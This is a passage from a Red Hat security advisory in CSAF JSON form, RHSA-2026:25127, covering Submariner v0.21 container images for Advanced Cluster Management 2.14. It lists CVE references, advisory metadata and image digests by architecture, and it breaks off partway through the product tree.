| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le | — |
Threats
Impact
Important
References
118 references
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:25127 | self |
| https://access.redhat.com/security/cve/CVE-2024-25621 | external |
| https://access.redhat.com/security/cve/CVE-2025-61726 | external |
| https://access.redhat.com/security/cve/CVE-2025-61728 | external |
| https://access.redhat.com/security/cve/CVE-2025-61729 | external |
| https://access.redhat.com/security/cve/CVE-2025-68121 | external |
| https://access.redhat.com/security/cve/CVE-2025-68151 | external |
| https://access.redhat.com/security/cve/CVE-2026-21441 | external |
| https://access.redhat.com/security/cve/CVE-2026-25679 | external |
| https://access.redhat.com/security/cve/CVE-2026-26017 | external |
| https://access.redhat.com/security/cve/CVE-2026-26018 | external |
| https://access.redhat.com/security/cve/CVE-2026-32280 | external |
| https://access.redhat.com/security/cve/CVE-2026-32936 | external |
| https://access.redhat.com/security/cve/CVE-2026-33186 | external |
| https://access.redhat.com/security/cve/CVE-2026-34986 | external |
| https://access.redhat.com/security/cve/CVE-2026-35579 | external |
| https://access.redhat.com/security/updates/classi… | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2024-25621 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2413190 | external |
| https://www.cve.org/CVERecord?id=CVE-2024-25621 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2024-25621 | external |
| https://github.com/containerd/containerd/blob/mai… | external |
| https://github.com/containerd/containerd/commit/7… | external |
| https://github.com/containerd/containerd/security… | external |
| https://access.redhat.com/security/cve/CVE-2025-61726 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2434432 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-61726 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-61726 | external |
| https://go.dev/cl/736712 | external |
| https://go.dev/issue/77101 | external |
| https://groups.google.com/g/golang-announce/c/Vd2… | external |
| https://pkg.go.dev/vuln/GO-2026-4341 | external |
| https://access.redhat.com/security/cve/CVE-2025-61728 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2434431 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-61728 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-61728 | external |
| https://go.dev/cl/736713 | external |
| https://go.dev/issue/77102 | external |
| https://pkg.go.dev/vuln/GO-2026-4342 | external |
| https://access.redhat.com/security/cve/CVE-2025-61729 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2418462 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-61729 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-61729 | external |
| https://go.dev/cl/725920 | external |
| https://go.dev/issue/76445 | external |
| https://groups.google.com/g/golang-announce/c/8FJ… | external |
| https://pkg.go.dev/vuln/GO-2025-4155 | external |
| https://access.redhat.com/security/cve/CVE-2025-68121 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2437111 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-68121 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-68121 | external |
| https://go.dev/cl/737700 | external |
| https://go.dev/issue/77217 | external |
| https://groups.google.com/g/golang-announce/c/K09… | external |
| https://pkg.go.dev/vuln/GO-2026-4337 | external |
| https://access.redhat.com/security/cve/CVE-2025-68151 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2428009 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-68151 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-68151 | external |
| https://github.com/coredns/coredns/commit/0d8cbb1… | external |
| https://github.com/coredns/coredns/pull/7490 | external |
| https://github.com/coredns/coredns/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-21441 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2427726 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-21441 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-21441 | external |
| https://github.com/urllib3/urllib3/commit/8864ac4… | external |
| https://github.com/urllib3/urllib3/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-25679 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2445356 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-25679 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-25679 | external |
| https://go.dev/cl/752180 | external |
| https://go.dev/issue/77578 | external |
| https://groups.google.com/g/golang-announce/c/Edh… | external |
| https://pkg.go.dev/vuln/GO-2026-4601 | external |
| https://access.redhat.com/security/cve/CVE-2026-26017 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2445244 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-26017 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-26017 | external |
| https://github.com/coredns/coredns/releases/tag/v1.14.2 | external |
| https://github.com/coredns/coredns/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-26018 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2445242 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-26018 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-26018 | external |
| https://github.com/coredns/coredns/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-32280 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2456339 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-32280 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-32280 | external |
| https://go.dev/cl/758320 | external |
| https://go.dev/issue/78282 | external |
| https://groups.google.com/g/golang-announce/c/0uY… | external |
| https://pkg.go.dev/vuln/GO-2026-4947 | external |
| https://access.redhat.com/security/cve/CVE-2026-32936 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2466869 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-32936 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-32936 | external |
| https://github.com/coredns/coredns/releases/tag/v1.14.3 | external |
| https://github.com/coredns/coredns/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-33186 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2449833 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-33186 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-33186 | external |
| https://github.com/grpc/grpc-go/security/advisori… | external |
| https://access.redhat.com/security/cve/CVE-2026-34986 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2455470 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-34986 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-34986 | external |
| https://github.com/go-jose/go-jose/security/advis… | external |
| https://pkg.go.dev/github.com/go-jose/go-jose/v4#… | external |
| https://access.redhat.com/security/cve/CVE-2026-35579 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2466905 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-35579 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-35579 | external |
| https://github.com/coredns/coredns/security/advis… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Submariner v0.21 General Availability release images, which provide enhancements, security fixes, and updated container images.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.\nRed Hat Advanced Cluster Management for Kubernetes v2.14",
"title": "Topic"
},
{
"category": "general",
"text": "Submariner is a Kubernetes operator that enables cross-cluster connectivity for services and pods, implementing KEP-1645 (Multi-Cluster Services API). After deploying the Submariner operator, it can enable direct networking between pods and services across different Kubernetes clusters.\n\nFor more information about Submariner, see the Submariner open source community website at: https://submariner.io/.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:25127",
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2024-25621",
"url": "https://access.redhat.com/security/cve/CVE-2024-25621"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61728",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61729",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68121",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68151",
"url": "https://access.redhat.com/security/cve/CVE-2025-68151"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-21441",
"url": "https://access.redhat.com/security/cve/CVE-2026-21441"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25679",
"url": "https://access.redhat.com/security/cve/CVE-2026-25679"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26017",
"url": "https://access.redhat.com/security/cve/CVE-2026-26017"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26018",
"url": "https://access.redhat.com/security/cve/CVE-2026-26018"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-32280",
"url": "https://access.redhat.com/security/cve/CVE-2026-32280"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-32936",
"url": "https://access.redhat.com/security/cve/CVE-2026-32936"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33186",
"url": "https://access.redhat.com/security/cve/CVE-2026-33186"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-34986",
"url": "https://access.redhat.com/security/cve/CVE-2026-34986"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-35579",
"url": "https://access.redhat.com/security/cve/CVE-2026-35579"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_25127.json"
}
],
"title": "Red Hat Security Advisory: Submariner v0.21 security fixes and container updates",
"tracking": {
"current_release_date": "2026-06-17T08:03:05+00:00",
"generator": {
"date": "2026-06-17T08:03:05+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.0.0"
}
},
"id": "RHSA-2026:25127",
"initial_release_date": "2026-06-10T20:51:55+00:00",
"revision_history": [
{
"date": "2026-06-10T20:51:55+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-06-10T20:51:57+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-06-17T08:03:05+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product": {
"name": "Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:acm:2.14::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Advanced Cluster Management for Kubernetes"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"product_id": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lighthouse-agent-rhel9@sha256%3Abbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2/lighthouse-agent-rhel9\u0026tag=1780204232"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"product_id": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lighthouse-coredns-rhel9@sha256%3Aeee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2/lighthouse-coredns-rhel9\u0026tag=1780204249"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"product_id": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/nettest-rhel9@sha256%3A80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2/nettest-rhel9\u0026tag=1780241410"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"product_id": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"product_identification_helper": {
"purl": "pkg:oci/subctl-rhel9@sha256%3Acac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2/subctl-rhel9\u0026tag=1780238563"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"product_id": "registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"product_identification_helper": {
"purl": "pkg:oci/submariner-operator-bundle@sha256%3A5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2/submariner-operator-bundle\u0026tag=1780248353"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"product_id": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/submariner-gateway-rhel9@sha256%3A5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2/submariner-gateway-rhel9\u0026tag=1780204887"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"product_id": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"product_identification_helper": {
"purl": "pkg:oci/submariner-globalnet-rhel9@sha256%3Aa7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2/submariner-globalnet-rhel9\u0026tag=1780204696"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"product_id": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/submariner-rhel9-operator@sha256%3A2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2/submariner-rhel9-operator\u0026tag=1780204322"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"product_id": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/submariner-route-agent-rhel9@sha256%3A5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2/submariner-route-agent-rhel9\u0026tag=1780204631"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"product_id": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lighthouse-agent-rhel9@sha256%3A0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2/lighthouse-agent-rhel9\u0026tag=1780204232"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"product_id": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lighthouse-coredns-rhel9@sha256%3A84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2/lighthouse-coredns-rhel9\u0026tag=1780204249"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"product_id": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/nettest-rhel9@sha256%3A5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2/nettest-rhel9\u0026tag=1780241410"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"product_id": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/subctl-rhel9@sha256%3A5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2/subctl-rhel9\u0026tag=1780238563"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"product_id": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/submariner-gateway-rhel9@sha256%3A157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2/submariner-gateway-rhel9\u0026tag=1780204887"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"product_id": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/submariner-globalnet-rhel9@sha256%3Aed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2/submariner-globalnet-rhel9\u0026tag=1780204696"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"product_id": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/submariner-rhel9-operator@sha256%3A100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2/submariner-rhel9-operator\u0026tag=1780204322"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le",
"product_id": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/submariner-route-agent-rhel9@sha256%3Ac52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2/submariner-route-agent-rhel9\u0026tag=1780204631"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"product_id": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lighthouse-agent-rhel9@sha256%3Aeac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2/lighthouse-agent-rhel9\u0026tag=1780204232"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"product_id": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lighthouse-coredns-rhel9@sha256%3Ae688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2/lighthouse-coredns-rhel9\u0026tag=1780204249"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"product_id": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/nettest-rhel9@sha256%3Af928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2/nettest-rhel9\u0026tag=1780241410"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"product_id": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"product_identification_helper": {
